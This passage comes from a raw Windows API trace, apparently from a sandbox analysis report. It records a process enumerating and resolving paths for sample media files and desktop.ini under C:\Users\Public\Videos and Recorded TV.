videos\\wildlife.wmv"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a)) returned 1 [0246.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0246.672] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), fInfoLevelId=0x0, lpFileInformation=0x74468e8 | out: lpFileInformation=0x74468e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a)) returned 1 [0246.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0246.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.672] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a)) returned 1 [0246.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV", lpFilePart=0x0) returned 0x1b [0246.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\", lpFilePart=0x0) returned 0x1c [0246.672] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.673] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.673] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.673] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0246.673] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.673] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.673] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV", lpFilePart=0x0) returned 0x1b [0246.673] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\", lpFilePart=0x0) returned 0x1c [0246.673] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.674] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.674] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.674] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0246.674] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0246.674] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\desktop.ini", lpFilePart=0x0) returned 0x27 [0246.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\desktop.ini", lpFilePart=0x0) returned 0x27 [0246.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\desktop.ini", lpFilePart=0x0) returned 0x27 [0246.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media", lpFilePart=0x0) returned 0x28 [0246.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpFilePart=0x0) returned 0x29 [0246.674] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0246.675] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.675] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media", lpFilePart=0x0) returned 0x28 [0246.675] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpFilePart=0x0) returned 0x29 [0246.675] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0246.675] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.676] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", lpFilePart=0x0) returned 0x34 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", lpFilePart=0x0) returned 0x34 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", lpFilePart=0x0) returned 0x34 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] 